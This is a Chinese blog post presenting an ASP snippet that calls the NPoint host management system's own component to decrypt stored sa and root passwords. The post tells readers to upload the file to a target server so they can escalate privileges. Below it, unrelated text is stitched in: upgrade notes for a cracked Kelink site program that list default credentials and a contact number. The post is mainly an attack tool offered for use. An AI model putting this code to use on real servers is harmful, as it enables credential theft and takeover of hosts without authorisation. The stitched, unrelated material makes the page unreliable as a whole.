N点主机管理系统密码解密代码程序

2010年12月20日 星期一 07:22


之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.
这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵.
首先得了解下N点主机管理系统的密码加密可并非是cmd5等加密方式加密的.
即使用<N点主机管理系统漏洞利用与防御措>里介绍的办法登陆了管理系统的后台也是拿不下服务器的.
在N点主机管理系统下想获得服务器的权限也就是利用数据库里保存的sa帐号和root帐号才可以提权的.
但是密码是加密的,没办法获取,这次所发的代码利用程序是调用它的conn.asp来解迷的,呵呵.
原理这里就不仔细的说了,相关的代码网上也有公布,但是和我公布的并不一样,用起来也比我这个麻烦多了.
代码如下:
<!--#include file="inc/conn.asp" -->
<!--#include file="inc/siteinfo.asp" -->
<!--#include file="inc/char.asp" -->
<%
set iishost=server.CreateObject("npoint.host")
x=iishost.Eduserpassword("NLFPK@OJCOCLA@E@FEKJMFADLALKLF@JHOIMAHO@LCDBAAMEOEKGKM@A",0)
response.write x
%>
使用方法,复制该代码,创建个任意的asp文件,传在目标N点管理系统web下,把需要解密的密码,替换下代码里的那个密码.
在IE浏览器里浏览刚创建和保存的asp解迷文件地址,即可显示出所解迷的明文密码.(别告诉我说你不知道该怎么用噢)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
你好,首先感谢你下载李枫破解的柯林net9.0干净数据库程序数据库文件根目录的1.bak用星外的主机管理可以自助还原,如果使用的其他主机管理请联系空间商协助还原数据库数据库连接路径在根目录Web.config文件里,不懂请不要随意修改Web.config里面的配置严重导致程序报废。已升级为20110206最新个人标准版。手机、电脑的超级管理员区不懂请不要随意更改。程序上传至空间很目录后还原数据库并写好连接文件即可完美使用。 进入web后台超级管理员区→进系统全局设置→域名地址转发 主域名:填你的网址 指向地址:http://这里写你的网址/wapindex.aspx?siteid=1000 账wap 密888888 有不懂的请联系QQ991685161 升级方法: 1.上传update目录,并执行访问:http://你的域名/update/go20120206.aspx 2.上传升级包覆盖。 3.看下面说明,增改web.config 4.完成测试。 升级内容: 1.增加防止会员用代码过滤系统全局广告功能 2.web.config 中的 <!--登录失败次数限制,防密码被破,设为0时不限制--> <add key="KL_LoginTime" value="0"/> 设为0时不限制 3.web.config中增加: <!--KL_In主要配置SQL注入的英文字符,此处的KL_Filter_All是过滤所有中文或其它字符。例:WML或电脑版写代码时是不能过滤KL_In中的字符的,但是要过滤以下非法字符(太多数可能是脚本或过滤广告代码)--> <add key="KL_Filter_All " value="card|wml|display|操蛋|内射"/> <!--显示标题链接UBB:[功能模块标识=N_M_X_Y]中的X=5为随机所有,实际为以下最新多条进行随机,默认100--> <add key="KL_OrderByNew" value="100"/> <!--是否开启WEB排版功能,1为开启(如开启请配置KL_Filter_All过滤字符),0为关闭(当关闭或排版内容为空时默认进入WAP2.0页面)--> <add key="KL_Open_Web" value="1"/> 4.web.config中的: <!--[优先级1]当移动网关不提供UA时将进入WAP1.0--> <!--[优先级2]移动网关提供有UA情况下,有些浏览器不支持wap1.0/2.0,只支持电脑访问如苹果的Safari浏览器,有以下UA关键字进入电脑版--> <add key="KL_GoVersion3" value="Safari|iPhone" /> <!--[优先级3]移动网关提供有UA情况下,当网站进入不同版本设为自动识别时(0),有以下UA关键字时进入2.0界面--> <add key="KL_GoVersion2" value="Opera|CE|UC|Phone|Windows|Mozilla" /> 替换改成: <!--[优先级0]强制进入WAP2.0--> <add key="KL_GoVersion0" value="Opera|SP|CE"/> <!--[优先级1]当移动网关不提供UA时将进入WAP1.0,建义留空--> <add key="KL_GoVersion1" value=""/> <!--[优先级2]移动网关提供有UA情况下,进入平版触屏幕,一般留空由界面上选择进入--> <add key="KL_GoVersion4" value=""/> <!--[优先级3]移动网关提供有UA情况下,进入电脑版--> <add key="KL_GoVersion3" value="Windows NT|MSIE|Firefox"/> <!--[优先级4]移动网关提供有UA情况下,当网站进入不同版本设为自动识别时(0),有以下UA关键字时进入2.0界面--> <add key="KL_GoVersion2" value="Safari|iPhone|ios|Android|Opera|CE|UC|QQ|Phone|Mobile|Mozilla"/> 5.增加防串号后捣乱功能,网站默认设置增加:[31]发贴回贴发短信等是否需要密码验证 一些重要操作也增加每次需要录入密码验证功能。 6.增加过滤WAP1.0不支持的特殊字符如: 7.发贴增加UBB方法:[buyrmb=RMB数]输入内容[/buyrmb] 直接用直实的RMB购买贴。 8.WAP在线支付,由于支付宝升级将WAP支付宝和网银合在一起了。所以本系统也一起合并了。 网银支付可以在WAP支付宝页面中找到:快捷网银支付。 9.WEB,用户管理-->修改用户资料,身份级别显示增加有效时间,及更改日期操作 WAP,站长管理台台-->05.注册会员管理-->管理中,身份级别显示增加有效时间,及更改日期操作 WAP,我的地盘-->购买身份级别规则-->增加购买年份 需要身份级别访问权限的栏目将判断有效日期。 当没有权限时,提示页面也更加人性化。 10.WAP站长后台-->页面综合排版-->修改LOGO 增加:2.不显示;3.上传LOGO 按钮 11.拍卖功能修复BUG,先冻结虚拟币。一口价功能修复,当会员出的价大于或等于一口价时,中标及结束竞拍。 12.论坛赏币功能增加银行帐号记录,论坛增加栏目有效性判断,论坛续贴可以改标题 管理删帖时、可以输入删帖理由,系统将理由以内线形式发给友友 论坛贴增加[分享]:新浪.腾讯.搜狐.网易 13.WAP和WEB站长管理后台-->新增:【11.注册邀请码管理】, 【注册开关设置】设置新增:4_只开手动注册+邀请码 14.显示信息:[message]和[automsg]增加返回原地址功能 新增加UBB:[msg][img]图片地址[/img]您有x条信息![/msg] (x会替换成实际数量) 15.WEB后台-->用户管理-->用户资料管理 显示改版,增加导出email功能。 16.增加UBB:背景音乐:[bgsound]铃声地址[/bgsound] 例:[bgsound]http://kelink.com/1.mid[/bgsound] 17.UBB中的[ua]和[ua1] 对应机型有扩展内容(系统资源-->手机型号资源-->管理扩展内容),将在后面显示。 18.友情链接模块,添加删除内容管理中,【栏目配置】中增加: [3]显示投票功能,[5]外站链入后进入首页或友链栏目 解决防SID被对方网站获取问题。 同时增加友链防SID盗链接UBB:[url=/link/go.aspx?siteid=[siteid]&url;=外站的URL地址]网站说明[/url] 19.增加统计UBB: 我的好友总数:[friend]0[/friend] 我的黑名单数:[friend]1[/friend] 我的追求总数:[friend]2[/friend] 追求我的人数:[friend]4[/friend] 我推荐的人数:[friend]5[/friend] 20.WEB和WAP超级管理员后台,数据库备份改成数据库维护 功能拆分成: 4.一键清空站内信息 5.一键清空击日志/在线记录/操作日志 21.增加通过缓存快速返回上一页面UBB:[return]返回上一页面[/return] 22.搜索会员列表,增加头像显示,个人空间中的"TA"自动识别为:我,他,她 23.WEB页面综合排版中的[插][顶][底]保存前增加 【预览】功能 24.普通栏目增加:消费扣币功能 25.WEB排版功能,网站管理-->电脑网站独立页面综合排版

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值